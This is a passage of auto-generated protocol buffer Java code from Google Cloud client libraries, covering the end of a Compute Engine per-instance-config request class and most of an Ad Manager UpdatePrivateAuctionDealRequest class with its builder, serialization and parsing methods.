* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder() { return getPerInstanceConfigsFieldBuilder() .addBuilder(com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder() .addBuilder(index, com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig.Builder> getPerInstanceConfigsBuilderList() { return getPerInstanceConfigsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsFieldBuilder() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder>( perInstanceConfigs_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); perInstanceConfigs_ = null; } return perInstanceConfigsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet 
unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) } // @@protoc_insertion_point(class_scope:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) private static final com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq(); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<InstanceGroupManagersUpdatePerInstanceConfigsReq> PARSER = new com.google.protobuf.AbstractParser< InstanceGroupManagersUpdatePerInstanceConfigsReq>() { @java.lang.Override public InstanceGroupManagersUpdatePerInstanceConfigsReq parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException() .setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<InstanceGroupManagersUpdatePerInstanceConfigsReq> parser() { return PARSER; } @java.lang.Override public 
com.google.protobuf.Parser<InstanceGroupManagersUpdatePerInstanceConfigsReq> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,850
java-admanager/proto-ad-manager-v1/src/main/java/com/google/ads/admanager/v1/UpdatePrivateAuctionDealRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/admanager/v1/private_auction_deal_service.proto // Protobuf Java Version: 3.25.8 package com.google.ads.admanager.v1; /** * * * <pre> * Request object for `UpdatePrivateAuctionDeal` method. * </pre> * * Protobuf type {@code google.ads.admanager.v1.UpdatePrivateAuctionDealRequest} */ public final class UpdatePrivateAuctionDealRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) UpdatePrivateAuctionDealRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdatePrivateAuctionDealRequest.newBuilder() to construct. 
private UpdatePrivateAuctionDealRequest( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdatePrivateAuctionDealRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdatePrivateAuctionDealRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.class, com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.Builder.class); } private int bitField0_; public static final int PRIVATE_AUCTION_DEAL_FIELD_NUMBER = 1; private com.google.ads.admanager.v1.PrivateAuctionDeal privateAuctionDeal_; /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the privateAuctionDeal field is set. */ @java.lang.Override public boolean hasPrivateAuctionDeal() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The privateAuctionDeal. 
*/ @java.lang.Override public com.google.ads.admanager.v1.PrivateAuctionDeal getPrivateAuctionDeal() { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder getPrivateAuctionDealOrBuilder() { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? 
com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getPrivateAuctionDeal()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getPrivateAuctionDeal()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest)) { return super.equals(obj); } com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest other = (com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) obj; if (hasPrivateAuctionDeal() != other.hasPrivateAuctionDeal()) return false; if (hasPrivateAuctionDeal()) { if (!getPrivateAuctionDeal().equals(other.getPrivateAuctionDeal())) return false; } if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return 
memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasPrivateAuctionDeal()) { hash = (37 * hash) + PRIVATE_AUCTION_DEAL_FIELD_NUMBER; hash = (53 * hash) + getPrivateAuctionDeal().hashCode(); } if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( 
java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? 
new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request object for `UpdatePrivateAuctionDeal` method. * </pre> * * Protobuf type {@code google.ads.admanager.v1.UpdatePrivateAuctionDealRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.class, com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.Builder.class); } // Construct using com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getPrivateAuctionDealFieldBuilder(); getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; privateAuctionDeal_ = null; if (privateAuctionDealBuilder_ != null) { 
privateAuctionDealBuilder_.dispose(); privateAuctionDealBuilder_ = null; } updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.admanager.v1.PrivateAuctionDealServiceProto .internal_static_google_ads_admanager_v1_UpdatePrivateAuctionDealRequest_descriptor; } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest getDefaultInstanceForType() { return com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest build() { com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest buildPartial() { com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest result = new com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.privateAuctionDeal_ = privateAuctionDealBuilder_ == null ? privateAuctionDeal_ : privateAuctionDealBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? 
updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) { return mergeFrom((com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest other) { if (other == com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest.getDefaultInstance()) return this; if (other.hasPrivateAuctionDeal()) { mergePrivateAuctionDeal(other.getPrivateAuctionDeal()); } if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getPrivateAuctionDealFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.ads.admanager.v1.PrivateAuctionDeal privateAuctionDeal_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.admanager.v1.PrivateAuctionDeal, com.google.ads.admanager.v1.PrivateAuctionDeal.Builder, com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder> privateAuctionDealBuilder_; /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the privateAuctionDeal field is set. */ public boolean hasPrivateAuctionDeal() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The privateAuctionDeal. 
*/ public com.google.ads.admanager.v1.PrivateAuctionDeal getPrivateAuctionDeal() { if (privateAuctionDealBuilder_ == null) { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } else { return privateAuctionDealBuilder_.getMessage(); } } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setPrivateAuctionDeal(com.google.ads.admanager.v1.PrivateAuctionDeal value) { if (privateAuctionDealBuilder_ == null) { if (value == null) { throw new NullPointerException(); } privateAuctionDeal_ = value; } else { privateAuctionDealBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setPrivateAuctionDeal( com.google.ads.admanager.v1.PrivateAuctionDeal.Builder builderForValue) { if (privateAuctionDealBuilder_ == null) { privateAuctionDeal_ = builderForValue.build(); } else { privateAuctionDealBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. 
* </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergePrivateAuctionDeal(com.google.ads.admanager.v1.PrivateAuctionDeal value) { if (privateAuctionDealBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && privateAuctionDeal_ != null && privateAuctionDeal_ != com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance()) { getPrivateAuctionDealBuilder().mergeFrom(value); } else { privateAuctionDeal_ = value; } } else { privateAuctionDealBuilder_.mergeFrom(value); } if (privateAuctionDeal_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearPrivateAuctionDeal() { bitField0_ = (bitField0_ & ~0x00000001); privateAuctionDeal_ = null; if (privateAuctionDealBuilder_ != null) { privateAuctionDealBuilder_.dispose(); privateAuctionDealBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.ads.admanager.v1.PrivateAuctionDeal.Builder getPrivateAuctionDealBuilder() { bitField0_ |= 0x00000001; onChanged(); return getPrivateAuctionDealFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. 
* </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder getPrivateAuctionDealOrBuilder() { if (privateAuctionDealBuilder_ != null) { return privateAuctionDealBuilder_.getMessageOrBuilder(); } else { return privateAuctionDeal_ == null ? com.google.ads.admanager.v1.PrivateAuctionDeal.getDefaultInstance() : privateAuctionDeal_; } } /** * * * <pre> * Required. The `PrivateAuctionDeal` to update. * * The `PrivateAuctionDeal`'s `name` is used to identify the * `PrivateAuctionDeal` to update. * </pre> * * <code> * .google.ads.admanager.v1.PrivateAuctionDeal private_auction_deal = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.admanager.v1.PrivateAuctionDeal, com.google.ads.admanager.v1.PrivateAuctionDeal.Builder, com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder> getPrivateAuctionDealFieldBuilder() { if (privateAuctionDealBuilder_ == null) { privateAuctionDealBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.admanager.v1.PrivateAuctionDeal, com.google.ads.admanager.v1.PrivateAuctionDeal.Builder, com.google.ads.admanager.v1.PrivateAuctionDealOrBuilder>( getPrivateAuctionDeal(), getParentForChildren(), isClean()); privateAuctionDeal_ = null; } return privateAuctionDealBuilder_; } private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. 
*/ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to update. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000002); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000002; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Required. The list of fields to update. 
